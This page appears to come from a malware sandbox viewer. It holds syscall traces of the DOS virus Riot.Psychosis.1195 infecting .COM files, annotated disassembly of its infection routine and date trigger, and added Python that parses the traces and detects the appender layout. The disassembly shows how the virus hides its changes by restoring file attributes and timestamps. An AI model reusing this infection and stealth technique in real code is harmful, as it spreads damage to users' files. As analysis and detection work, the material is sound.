Sample viewer

vx.netlux.org/Virus.DOS.Riot.Psychosis.1195

Syscalls:

Time  Syscall Op (INT 21h function, AH in decimal)  PC (return address after INT 21h)  | Syscall Name
2018-12-17T22:18:17.215239886Z 71 PC: 12b2d | Get current directory
2018-12-17T22:18:17.219036741Z 59 PC: 12b38 | Change current directory
2018-12-17T22:18:17.223526351Z 26 PC: 12beb | Set disk transfer address
2018-12-17T22:18:17.224900916Z 78 PC: 12bf9 | Find first file
2018-12-17T22:18:17.241619207Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:18:17.251711407Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:18:17.255680679Z 44 PC: 12c9e | Get time
    0x12c9e: add dl, dh                  ; AH=2Ch returned DH=seconds, DL=hundredths: fold both into one byte
    0x12ca0: je 0x12c9a                  ; zero: back to the INT 21h at 0x12c9a and read the clock again
    0x12ca2: mov si, 0x115
    0x12ca5: add si, word ptr [0x106]    ; word at 0x106 (inside the rewritten 8-byte host header) relocates body-relative addresses
    0x12ca9: mov byte ptr [si], dl       ; keep the nonzero clock-derived byte in a virus variable
    0x12cab: mov ax, 0x4301              ; AH=43h AL=01h: set file attributes
    0x12cae: xor cx, cx                  ; CX=0 clears read-only/hidden/system on the host
    0x12cb0: mov dx, si
    0x12cb2: add dx, 0xb4                ; DS:DX -> host filename (same pointer is reused for the reopen)
    0x12cb6: int 0x21
    0x12cb8: mov ah, 0x3e                ; AH=3Eh: close the handle used for the 8-byte header read
    0x12cba: int 0x21
    0x12cbc: mov ax, 0x3d02              ; AH=3Dh AL=02h: reopen the host read/write
    0x12cbf: int 0x21
    0x12cc1: jb 0x12c45                  ; CF set: open failed, skip this file
    0x12cc3: mov di, dx
    0x12cc5: add di, 0x5d
    0x12cc8: stosw word ptr es:[di], ax  ; save the new handle in the virus body (ES=DS in a .COM)
    0x12cc9: xchg ax, bx                 ; BX = handle for the writes that follow
    0x12cca: mov ah, 0x40                ; AH=40h: write; the 4-, 2- and 2-byte header writes come next in the trace
2018-12-17T22:18:17.257814921Z 67 PC: 12cb8 | Get or set file attributes
2018-12-17T22:18:17.272182573Z 62 PC: 12cbc | Close file
2018-12-17T22:18:17.274586574Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:18:17.281897668Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:18:17.286398499Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.290079523Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.292890919Z 66 PC: 12d04 | Move file pointer
2018-12-17T22:18:17.295414365Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-17T22:18:17.305038347Z 87 PC: 12d1d | Get or set file date and time
2018-12-17T22:18:17.306714089Z 62 PC: 12d21 | Close file
2018-12-17T22:18:17.335119199Z 67 PC: 12d32 | Get or set file attributes
2018-12-17T22:18:17.345423525Z 79 PC: 12c0c | Find next file
2018-12-17T22:18:17.350995613Z 61 PC: 12c24 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:18:17.35570187Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:18:17.35992793Z 44 PC: 12c9e | Get time (See above)
2018-12-17T22:18:17.361420362Z 67 PC: 12cb8 | Get or set file attributes
2018-12-17T22:18:17.368711322Z 62 PC: 12cbc | Close file
2018-12-17T22:18:17.371270562Z 61 PC: 12cc1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:18:17.378222757Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:18:17.383393169Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.386929899Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.389407634Z 66 PC: 12d04 | Move file pointer
2018-12-17T22:18:17.391704133Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-17T22:18:17.401759524Z 87 PC: 12d1d | Get or set file date and time
2018-12-17T22:18:17.403429686Z 62 PC: 12d21 | Close file
2018-12-17T22:18:17.412082018Z 67 PC: 12d32 | Get or set file attributes
2018-12-17T22:18:17.422503475Z 79 PC: 12c0c | Find next file
2018-12-17T22:18:17.425026475Z 61 PC: 12c24 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:18:17.431558891Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:18:17.438485322Z 44 PC: 12c9e | Get time (See above)
2018-12-17T22:18:17.440797221Z 67 PC: 12cb8 | Get or set file attributes
2018-12-17T22:18:17.451138136Z 62 PC: 12cbc | Close file
2018-12-17T22:18:17.45353635Z 61 PC: 12cc1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:18:17.460243398Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:18:17.463212232Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.466704464Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.46950768Z 66 PC: 12d04 | Move file pointer
2018-12-17T22:18:17.47158669Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-17T22:18:17.481394785Z 87 PC: 12d1d | Get or set file date and time
2018-12-17T22:18:17.482894166Z 62 PC: 12d21 | Close file
2018-12-17T22:18:17.490387217Z 67 PC: 12d32 | Get or set file attributes
2018-12-17T22:18:17.500407898Z 42 PC: 12b53 | Get date
    0x12b53: cmp dx, 0x606               ; AH=2Ah returned DH=month, DL=day: 0x0606 is 6 June
    0x12b57: je 0x12b5c                  ; on 6 June: go to 0x12d37
    0x12b59: jmp 0x12da2                 ; any other date: exit path; taken here (job clock 1 Jan 1980, DX=0x0101), hence the two Change current directory calls at 0x12dad/0x12db4 below
    0x12b5c: jmp 0x12d37
    0x12b5f: and ah, bh                  ; 0x12b5f-0x12b6a lie between the two jumps and are on neither path from the cmp; the listing decoded them linearly
    0x12b61: movsw word ptr es:[di], word ptr [si]
    0x12b62: mov ax, 0x5c4c
    0x12b65: add word ptr [di], ax
    0x12b67: add byte ptr [di - 0x75], dl
    0x12b6a: in al, dx
    0x12b6b: sub sp, 0x2c                ; from here a search routine with a 0x2C-byte stack buffer (a DTA is 43 bytes); not executed in this run
    0x12b6e: push si
    0x12b6f: jmp 0x12be0
    0x12b71: mov ah, 0x1a                ; AH=1Ah: set DTA to the stack buffer
    0x12b73: lea dx, word ptr [bp - 0x2c]
    0x12b76: int 0x21
    0x12b78: mov ah, 0x4e                ; AH=4Eh: find first
    0x12b7a: mov cx, 0x10                ; CX=10h: directory entries
    0x12b7d: mov dx, 0x1a2
    0x12b80: add dx, word ptr [0x106]    ; DS:DX -> search mask, addressed body-relative like the variables above
2018-12-17T22:18:17.502679447Z 59 PC: 12dad | Change current directory
2018-12-17T22:18:17.506484396Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}
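The run above repeats one call sequence for every host: read 8 bytes, take a clock byte, clear attributes, reopen read/write, write 4+2+2 bytes, seek, write 1195 bytes, restore the file date/time, restore attributes, find next. As an added example (not part of the sample viewer and not the virus's code), the Python below parses rows in this trace format and reduces each host's episode to those numbers. The `TRACE` excerpt is copied from the first run; the episode boundaries (from the first Open of a name to Find next / Get date) and the "appender" and "restores_metadata" labels are this script's interpretation of the trace, not something the viewer prints.

```python
"""Parse a vx.netlux.org sandbox syscall trace (the row format shown above) and
summarise, per host file, what the infector did.  Added example, not part of
the sample viewer; the excerpt below is copied from the first run on the page."""
import re
from dataclasses import dataclass

TRACE = """\
2018-12-17T22:18:17.241619207Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:18:17.251711407Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:18:17.255680679Z 44 PC: 12c9e | Get time
2018-12-17T22:18:17.257814921Z 67 PC: 12cb8 | Get or set file attributes
2018-12-17T22:18:17.272182573Z 62 PC: 12cbc | Close file
2018-12-17T22:18:17.274586574Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:18:17.281897668Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:18:17.286398499Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.290079523Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.292890919Z 66 PC: 12d04 | Move file pointer
2018-12-17T22:18:17.295414365Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-17T22:18:17.305038347Z 87 PC: 12d1d | Get or set file date and time
2018-12-17T22:18:17.306714089Z 62 PC: 12d21 | Close file
2018-12-17T22:18:17.335119199Z 67 PC: 12d32 | Get or set file attributes
2018-12-17T22:18:17.345423525Z 79 PC: 12c0c | Find next file
2018-12-17T22:18:17.350995613Z 61 PC: 12c24 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:18:17.35570187Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:18:17.35992793Z 44 PC: 12c9e | Get time
2018-12-17T22:18:17.361420362Z 67 PC: 12cb8 | Get or set file attributes
2018-12-17T22:18:17.368711322Z 62 PC: 12cbc | Close file
2018-12-17T22:18:17.371270562Z 61 PC: 12cc1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:18:17.378222757Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:18:17.383393169Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.386929899Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:18:17.389407634Z 66 PC: 12d04 | Move file pointer
2018-12-17T22:18:17.391704133Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-17T22:18:17.401759524Z 87 PC: 12d1d | Get or set file date and time
2018-12-17T22:18:17.403429686Z 62 PC: 12d21 | Close file
2018-12-17T22:18:17.412082018Z 67 PC: 12d32 | Get or set file attributes
"""

# Row layout: ISO time, INT 21h function number (AH, decimal), return PC, description.
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ah>\d+) PC: (?P<pc>[0-9a-f]+) \| (?P<desc>.*)$")
FILENAME_RE = re.compile(r"Filename = '([^']+)'")
BYTES_RE = re.compile(r"(?:Read|Write) (\d+) bytes on handle")
# INT 21h functions used below, as AH values (61 in the trace is 0x3D here).
OPEN, READ, WRITE, SEEK, ATTR = 0x3D, 0x3F, 0x40, 0x42, 0x43
FDATETIME, FINDNEXT, GETDATE = 0x57, 0x4F, 0x2A

@dataclass
class Call:
    ah: int
    pc: int
    desc: str
    filename: str = ""
    nbytes: int = 0

def parse_trace(text):
    """One Call per syscall row; disassembly, header and blank lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        c = Call(int(m["ah"]), int(m["pc"], 16), m["desc"])
        if f := FILENAME_RE.search(c.desc):
            c.filename = f.group(1)
        if b := BYTES_RE.search(c.desc):
            c.nbytes = int(b.group(1))
        calls.append(c)
    return calls

def host_summaries(calls):
    """Per-host episodes (first Open of a name .. Find next / Get date).  Writes before
    Move file pointer overwrite the header read earlier; the write after it is appended."""
    hosts, cur, seeked = [], None, False
    for c in calls:
        name = c.filename or "(elided)"          # later runs print "(See above)"
        if c.ah == OPEN and (cur is None or name != cur["name"]):
            cur = {"name": name, "header_read": 0, "header_written": 0,
                   "appended": 0, "attr_calls": 0, "datetime_restored": False}
            hosts.append(cur)
            seeked = False
        if cur is None:
            continue
        if c.ah == READ:
            cur["header_read"] += c.nbytes
        elif c.ah == SEEK:
            seeked = True
        elif c.ah == WRITE:
            cur["appended" if seeked else "header_written"] += c.nbytes
        elif c.ah == ATTR:
            cur["attr_calls"] += 1
        elif c.ah == FDATETIME:
            cur["datetime_restored"] = True
        elif c.ah in (FINDNEXT, GETDATE):
            cur = None
    return hosts

def classify(host, body_len=1195):
    """Trace pattern: 8 header bytes read and rewritten (4+2+2), body_len appended, metadata put back."""
    return {"appender": host["header_read"] == host["header_written"] == 8
                        and host["appended"] == body_len,
            "restores_metadata": host["attr_calls"] == 2 and host["datetime_restored"]}
```

Running `host_summaries(parse_trace(TRACE))` yields one record per host with `appended == 1195` (the figure in the sample name) and `header_read == header_written == 8`, which is why the 4+2+2 writes are read here as the saved host header being replaced in place. The `restores_metadata` flag records the two attribute calls and the date/time restore that hide the modification from a directory listing. Runs on this page that print "(See above)" instead of a filename are grouped under "(elided)".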

Syscalls:

Time  Syscall Op (INT 21h function, AH in decimal)  PC (return address after INT 21h)  | Syscall Name
2018-12-25T11:48:36.982869541Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:36.986715256Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:36.991860931Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:36.99310665Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:36.999893655Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:37.010620347Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:37.017886756Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:37.020484035Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:37.040998671Z 62 PC: 12cbc | Close file
2018-12-25T11:48:37.04370138Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:37.057238231Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:37.067015703Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:37.069967053Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:37.072870545Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:37.075869793Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:37.086498346Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:37.088687161Z 62 PC: 12d21 | Close file
2018-12-25T11:48:37.099047968Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:37.111414924Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:37.114794713Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:37.123218288Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:37.131305879Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:37.134105918Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:37.145625406Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:37.148415257Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:37.155805423Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:37.158910172Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:37.166803517Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:37.169871606Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:37.172082783Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:37.183107558Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:37.18543569Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:37.194964404Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:37.206937693Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:37.210601097Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:37.218442Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:37.226956027Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:37.229803757Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:37.240987779Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:37.243217926Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:37.252290047Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:37.256641407Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:37.260012554Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:37.26453287Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:37.267093551Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:37.277828553Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:37.280891909Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:37.290371691Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:37.3017682Z 42 PC: 12b53 | Get date (See above)
2018-12-25T11:48:37.305445978Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:37.310551059Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}
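The write sizes in these traces (8 bytes over the start of the host, 1195 bytes at the old end of file) are enough to check a .COM image on disk for the same layout. The Python below is an added example, not from the page or the sample: the images it checks are constructed here, and the assumption that the rewritten 8-byte header begins with a JMP rel16 into the appended body is this example's, since the trace gives the sizes of the writes but not their bytes. The check deliberately rejects a benign file that merely starts with a JMP.

```python
"""Structural check of a .COM image for the layout the trace implies: the first
8 bytes of the host rewritten in place and a 1195-byte body appended at the old
end of file.  Added example, not from the sample viewer; sample images are
constructed, and the JMP-first header is an assumption, not something the trace shows."""

BODY_LEN = 1195          # bytes appended per host in the trace above

def jmp_target(image):
    """File offset reached by a leading JMP rel16 (E9 lo hi), else None.
    A .COM loads at 0x100, so file offset == address - 0x100 and the target
    is 3 + rel counted from the start of the file."""
    if len(image) < 3 or image[0] != 0xE9:
        return None
    rel = int.from_bytes(image[1:3], "little", signed=True)
    return (3 + rel) & 0xFFFF

def check_com(image, body_len=BODY_LEN):
    """Flag an image whose entry JMP lands inside its last body_len bytes.
    host_size is the original length (where the body was appended)."""
    body_off = len(image) - body_len
    tgt = jmp_target(image)
    hit = tgt is not None and body_off >= 8 and body_off <= tgt < len(image)
    return {"size": len(image), "jmp_target": tgt,
            "host_size": body_off if hit else None, "suspicious": hit}

def build_infected(host, body, body_len=BODY_LEN):
    """Constructed test image laid out the way the trace writes it: 4 + 2 + 2
    header bytes over offsets 0..7, body at the old EOF.  Only the JMP is
    meaningful here; the other five header bytes are filler."""
    assert len(host) >= 8 and len(body) == body_len
    body_off = len(host)
    jmp = bytes([0xE9]) + ((body_off - 3) & 0xFFFF).to_bytes(2, "little")
    header = jmp + b"\x00" * 5
    return header + host[8:] + body

# Constructed samples: a benign host, a benign file that starts with a JMP, and the
# benign host laid out as the trace would leave it.
CLEAN_HOST = bytes([0xB4, 0x4C, 0xCD, 0x21]) + b"\x90" * 296   # mov ah,4Ch / int 21h + padding
JMP_FIRST = bytes([0xE9, 0x10, 0x00]) + b"\x90" * 1500          # jmp +0x10 into its own code
INFECTED = build_infected(CLEAN_HOST, b"\xCC" * BODY_LEN)
```

`check_com(INFECTED)` reports `suspicious: True` with `host_size == 300`, the length the host had before the append; `JMP_FIRST` is large enough to contain a 1195-byte tail but its entry jump lands at offset 0x13, so it is not flagged. The heuristic is specific to the 1195-byte variant traced here and would need its own body length for another appender.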

Syscalls:

Time  Syscall Op (INT 21h function, AH in decimal)  PC (return address after INT 21h)  | Syscall Name
2018-12-25T11:48:37.848802114Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:37.852183427Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:37.855975864Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:37.856870614Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:37.863166496Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:37.867182678Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:37.871026224Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:37.872662334Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:37.886397177Z 62 PC: 12cbc | Close file
2018-12-25T11:48:37.888450585Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:37.900273593Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:37.907078642Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:37.9087236Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:37.910345358Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:37.912050208Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:37.91761613Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:37.918579668Z 62 PC: 12d21 | Close file
2018-12-25T11:48:37.937764322Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:37.948045505Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:37.95074953Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:37.959054581Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:37.965670196Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:37.967706622Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:37.980117696Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:37.981772112Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:37.988201579Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:37.991761248Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:37.994184628Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:37.996676605Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:37.999386713Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:38.015054098Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:38.016984469Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:38.034509671Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:38.045282456Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:38.048246707Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:38.055523145Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:38.062874475Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:38.065242814Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:38.075052881Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:38.077169062Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:38.083842875Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:38.086560079Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:38.102389781Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:38.105500785Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:38.107689908Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:38.11808532Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:38.119540915Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:38.12769457Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:38.138855116Z 42 PC: 12b53 | Get date (See above)
2018-12-25T11:48:38.140955846Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:38.14960227Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

Syscalls:

Time  Syscall Op (INT 21h function, AH in decimal)  PC (return address after INT 21h)  | Syscall Name
2018-12-25T11:48:38.113457019Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:38.119507926Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:38.127969762Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:38.129064683Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:38.135937378Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:38.143035129Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:38.149372327Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:38.151604423Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:38.176225106Z 62 PC: 12cbc | Close file
2018-12-25T11:48:38.177964595Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:38.18472848Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:38.193236751Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:38.195859607Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:38.19860254Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:38.20144942Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:38.213437508Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:38.215111616Z 62 PC: 12d21 | Close file
2018-12-25T11:48:38.228337474Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:38.238861684Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:38.241614115Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:38.249137984Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:38.255695592Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:38.258062398Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:38.26836915Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:38.270613901Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:38.277314268Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:38.280447622Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:38.295125563Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:38.297721739Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:38.299985371Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:38.309624019Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:38.311309122Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:38.319541068Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:38.329478793Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:38.332070387Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:38.338634492Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:38.346018857Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:38.348178174Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:38.358213085Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:38.361428594Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:38.367952198Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:38.37055692Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:38.373831234Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:38.376592921Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:38.37869411Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:38.389023972Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:38.390444033Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:38.397890343Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:38.407545287Z 42 PC: 12b53 | Get date (See above)
2018-12-25T11:48:38.409831528Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:38.413697401Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

Syscalls:

Time  Syscall Op (INT 21h function, AH in decimal)  PC (return address after INT 21h)  | Syscall Name
2018-12-25T11:48:40.033814869Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:40.036874296Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:40.040728002Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:40.041629204Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:40.047694119Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.053933775Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:40.060011491Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:40.062187652Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:40.080347737Z 62 PC: 12cbc | Close file
2018-12-25T11:48:40.081975414Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:40.08909522Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:40.095693794Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.098310364Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:40.1010943Z 66 PC: 12d04 | Move file pointer
